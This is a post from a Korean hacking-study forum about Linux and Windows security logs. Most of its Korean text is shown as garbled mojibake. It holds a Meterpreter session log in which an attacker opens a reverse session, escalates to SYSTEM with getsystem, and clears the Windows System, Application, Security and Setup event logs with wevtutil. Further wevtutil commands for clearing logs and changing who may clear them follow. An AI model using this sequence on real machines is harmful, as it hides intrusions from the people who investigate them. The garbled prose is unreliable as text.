1596, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ÇØÅ·ÀßÇÏ°í½Í´Ù
   http://¾øÀ½
   boot.png (507.4 KB), Download : 0     [¿À¸¥ÂÊ ¹öÆ° ´­·¯ ´Ù¿î ¹Þ±â]
   ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8576 [º¹»ç]



(À̹ÌÁö´Â /var/log/boot ·Î±×ÀÇ ¿¹½Ã)









À©µµ¿ì : eventlog
¹ÙÀ̳ʸ® ÆÄÀÏ·Î ÀÛ¼ºµÈ´Ù.

- ¸ÞŸ½ºÇ÷ÎÀÕÀ¸·Î À©µµ¿ì ¼­¹ö ·Î±× ±â·Ï Áö¿ì±â -

[*] Sending stage (1189423 bytes) to 192.168.0.1

[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:49164) at 2017-11-10 21:29:00 +0900

msf exploit(handler) > sessions



Active sessions

===============



  Id  Type                     Information                      Connection

  --  ----                     -----------                      ----------

  1   meterpreter x64/windows  WIN2008\Administrator @ WIN2008


msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...



meterpreter >

meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 636 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>wevtutil.exe el
wevtutil.exe el
Analytic
Application
....Áß·«.....
Microsoft-Windows-osk/Diagnostic
Microsoft-Windows-stobject/Diagnostic
Security
Setup
System
TabletPC_InputPanel_Channel
ThinPrint Diagnostics
WINDOWS_MP4SDECD_CHANNEL
WMPSetup
WMPSyncEngine
Windows PowerShell
microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin

C:\Windows\system32>wevtutil.exe cl "System"
wevtutil.exe cl "System"

C:\Windows\system32>wevtutil.exe cl "Application"
wevtutil.exe cl "Application"

C:\Windows\system32>wevtutil.exe cl "Security"
wevtutil.exe cl "Security"

C:\Windows\system32>wevtutil.exe cl "Setup"
wevtutil.exe cl "Setup"




- À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ý -
1. À̺¥Æ® ºä¸¦ ½ÃÀÛÇÑ´Ù.
2. ÄÜ¼Ö Æ®¸®¿¡¼­ Áö¿ì·Á´Â À̺¥Æ® ·Î±×·Î À̵¿ÇÑ´Ù.
3. ÀÛ¾÷ ¸Þ´º¿¡¼­ "·Î±× Áö¿ì±â"¸¦ Ŭ¸¯ÇÑ´Ù.
4. À̺¥Æ® ·Î±×¸¦ Áö¿ì°Å³ª º¹»çÇÑ ÈÄ Áö¿ï ¼ö ÀÖ´Ù.
5. ¸í·É ÁÙÀ» »ç¿ëÇÏ¿© À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.

¸í·É ÇÁ·ÒÇÁÆ®¸¦ ¿­°í ´ÙÀ½ ¸í·ÉÀ» ÀÔ·ÂÇÑ´Ù.

wevtutil cl <·Î±× À̸§> [/bu:<¹é¾÷ ÆÄÀÏ À̸§>]

Ãß°¡ÀûÀ¸·Î °í·ÁÇØ¾ß ÇÒ »çÇ×Àº
ÀÌ ÀÛ¾÷À» ¼öÇàÇϱâ À§ÇØ ·Î±×¿¡ "Áö¿ì±â" ±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÑ´Ù.
ÀϹÝÀûÀ¸·Î °ü¸®ÀÚ¿¡°Ô´Â ÀÌ ±ÇÇÑÀÌ ºÎ¿©µÈ´Ù.
´Ù¸¥ ±×·ì¿¡°Ô ·Î±×¿¡ ´ëÇÑ "Áö¿ì±â" ±ÇÇÑÀ» ¼³Á¤ÇÏ·Á¸é
´ÙÀ½°ú °°ÀÌ ¸í·ÉÀ» ÀÔ·ÂÇÏ¸é µÈ´Ù.

wevtutil sl <·Î±× À̸§> /ca:<º¸¾È ±â¼úÀÚ>

·Î±×¿¡ ´ëÇÑ SDDL(º¸¾È ±â¼úÀÚ Á¤ÀÇ ¾ð¾î) ¹®ÀÚ¿­À» º¸·Á¸é ´ÙÀ½ ¸í·ÉÀ» »ç¿ëÇÑ´Ù.

wevtutil gl <·Î±× À̸§>

¿¹¸¦ µé¾î, "¹é¾÷ ¿¬»êÀÚ" ±×·ì¿¡ ´ëÇÑ "ÀÀ¿ë ÇÁ·Î±×·¥"
·Î±×ÀÇ "Áö¿ì±â" ±ÇÇÑÀ» Ãß°¡ÇÏ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.

wevtutil sl ÀÀ¿ë ÇÁ·Î±×·¥ /ca:O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;B

·Î±× È®ÀÎ(À©µµ¿ì 2008±âÁØ)

½ÃÀÛ > Á¦¾îÆÇ > °ü¸®µµ±¸ > À̺¥Æ® ºä > Windows ·Î±×







¸®´ª½º : syslog (/var/log)
ÅؽºÆ®¸¦ ±â¹ÝÀ¸·Î ÀÛ¼ºµÈ´Ù.
ÇÏÁö¸¸ ¹ÙÀ̳ʸ®·Î ÀúÀåµÇ´Â °Íµµ ÀϺÎÀÖ´Ù.

#cat /var/log/messages
»ç¶÷ÀÌ Àϱâ ÆíÇÑ ÇüÅÂÀÇ ÅؽºÆ® ÆÄÀÏÀÌ´Ù.
½Ã½ºÅÛ º¯°æ »çÇ×µéÀÌ ÀúÀåµÇ¾î ÀÖ´Ù.
ħÇØ»ç°í´ëÀÀ¿¡¼­´Â ÀÌ ºÎºÐ¿¡¼­ À¯ÀǹÌÇÑ ·Î±×¸¦ ¹ß°ßÇϱ⠾î·Æ´Ù.
½Ã½ºÅÛ °ü¸®ÀÚÀÇ ·Î±×°¡ ¸¹Áö¸¸ ħÇØ»ç°í¿¡´Â º°·Î ¾ø´Ù.
ÇÏÁö¸¸ ²À È®ÀÎÀ» ÇؾßÇÑ´Ù.

#cat /var/log/auth.log
ÀÎÁõ ·Î±×, /var/log/secureµµ Á¸ÀçÇÑ´Ù.
¿ø°Ý ¶Ç´Â ·ÎÄà Á¢¼ÓµîÀÇ ·Î±× Á¤º¸°¡ Á¸ÀçÇÑ´Ù.

#cat /var/log/wtmp
»ç¿ëÀÚÀÇ ·Î±×ÀÎ/·Î±×¾Æ¿ô, ½Ã½ºÅÛ ºÎÆÃ/¼Ë´Ù¿î È÷½ºÅ丮 Á¤º¸

#cat /var/run/utmp
  Hit : 826     Date : 2024/05/20 10:42


    
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 19450
1595   [pwnable.kr] Shellshock[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 96
1594   ShellshockÀÇ ±âº» ¿ä¾à     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 77
1593   [pwnable.kr] fd     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/23 70
1592   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/22 77
1591   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/22 115
1590   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/20 84
1589   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/20 74
1588   [pwnable.kr] cmd1 °ø·«     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/23 236
1587   netdiscover ÆÄÀ̽ãÀ¸·Î ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/13 515
1586   ÆÄÀ̽ãÀ» ÀÌ¿ëÇÑ ½ÉÇà À¥ Å©·Ñ·¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/13 407
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/30 957
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/28 847
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/26 987
1582   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/20 675
  ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/20 825
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
 02/11 914
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
 07/25 1430
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/15 2306
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/15 1608
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org